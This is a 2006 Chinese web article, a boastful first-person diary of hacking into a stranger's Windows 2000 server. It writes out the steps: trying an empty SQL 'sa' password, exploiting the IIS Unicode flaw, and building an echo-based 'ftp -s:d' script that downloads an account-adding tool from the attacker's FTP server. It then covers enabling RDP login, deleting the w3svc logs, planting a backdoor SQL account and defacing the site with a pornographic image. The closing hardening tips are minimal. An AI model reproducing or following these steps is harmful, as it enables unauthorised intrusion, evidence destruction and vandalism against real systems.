WEB开发网
开发学院网络安全黑客技术 黑站手记:黑个网站 怎么这么难 阅读

黑站手记:黑个网站 怎么这么难

 2006-11-07 20:06:59 来源:WEB开发网   
核心提示:序言如果说黑U漏洞的站有手气背的,大概都比不上我,黑站手记:黑个网站 怎么这么难, 第一章找到一台破机器,看着他开了21、80、135、139、1433、3389 心想蛮好破的,那么就不要开这个服务; 2)删除文件时要考虑到备份文件是否存在; 3)端口能少开就少开,少开一点不会死,本来没什么兴趣,先用sql客户端连接

序言

如果说黑U漏洞的站有手气背的,大概都比不上我。

第一章

找到一台破机器,看着他开了21、80、135、139、1433、3389

心想蛮好破的,本来没什么兴趣,先用sql客户端连接,sa空密码试试。。。。

居然设置了密码,这个网管的智商可能大于40,呵呵,再看看U之类的喽。。。。

扫描结果显示有U,3389登录上去发现没有输入法漏洞,faint,我还真不知道这service pack怎么能打出这副样子出来,照说打了之后应该没有U漏洞啊。。。。

随便敲个dir+c: ftp*+/s,等了半天(这机器很烂),居然没有,估计是被尼姆达搞得不行了,才出此烂招,f**!!!

为了快一点,dir+c:winntsystem32ftp.exe,没有!!faint!!!

连这个都删??!!比我还变态。。。真没折了?那我的扫描记录留在那里多危险啊!!

靠,这么变态的网管,搞他没商量!!!

想了3秒种,得出了一个结论:

。。。。。。。。。。

其实FTP.exe是存在的~~,在哪里呢?

第二章

呣呣~~,他不是爱打services pack吗?凭他这么智障的网管,肯定忘记了在service pack有一个备份,微软为我们考虑得还挺周到啊,哈哈哈哈

吸取教训,直接整个硬盘查找,慢就慢点吧

dir c:ftp.exe /s,果然在service pack下面有这个鸟文件,copy过来。。。

好了,echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器(我不会告诉你的~~)

echo xxxxxx >>d 我的帐号,当然也不会告诉你

echo xxxxxx >>d 我的密码,你认为我会告诉你吗?

echo bin >>d 为什么?你们想想吧,反正加上不会遇到麻烦

echo get xxxxx >>d 方法太烂,不好意思告诉你,反正是可以用来加帐号的东西就行

echo bye >>d 礼貌一点,和我得FTP服务器说byebye

OK,

ftp -s:d

等着吧,一会儿功夫,报告cgi error,不管他,dir。。。。

shit !!!没有传过来,难道我的服务器....????

连接上我的服务器看看,一切正常啊,

type d ,也很正常啊,怎么回事情?

ping 目标,发现速度奇慢,我大概知道怎么回事情了!!!

改写d!!!

echo open xxxxx >d

echo asdfasdf >>d

echo adsfasdf >>d

echo user xxxxx >>d

echo xxxxx >>d

echo bin >>d

echo get xxxx >>d

echo bye >>d

OK

ftp -s:d

这次好了,原因不明

连接进去,加帐号,然后3389进去。。。。

第三章

忽然说我这个帐号无权登录,faint!!! 黑个破站怎么这么烦??!!

改terminal services登录帐户限制

在我的机器上点击“我的电脑”-》管理-》\xxx.xxx.xxx.xxx-》确定(谁会按取消啊,真是。。。)

等了半个世纪左右,出来了服务列表,修改terminal services“属性”,登录帐户修改为“本机上的帐户”,重新启动terminalservices 服务,退出

再从3389登录进去,TMD,总算看到win2000的桌面了。

后记

停掉WWW服务,冲到c:winntsystem32logfiles下删w3svc日志,

在sql server里放个帐号,当然权限了sa一致,以后不爽了还能进来逛逛。。。。。

哇哈哈,不怕警察叔叔来找我喽~~!!

顺手改掉他那难看的index.html,放个黄色图片吧,凭那位网管的智商,大概也就看得懂这些了。。。

总结:

1)如果漏洞补丁没打全,那么就不要开这个服务;

2)删除文件时要考虑到备份文件是否存在;

3)端口能少开就少开,少开一点不会死,开多了死得难看。

Tags:手记 网站 怎么

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接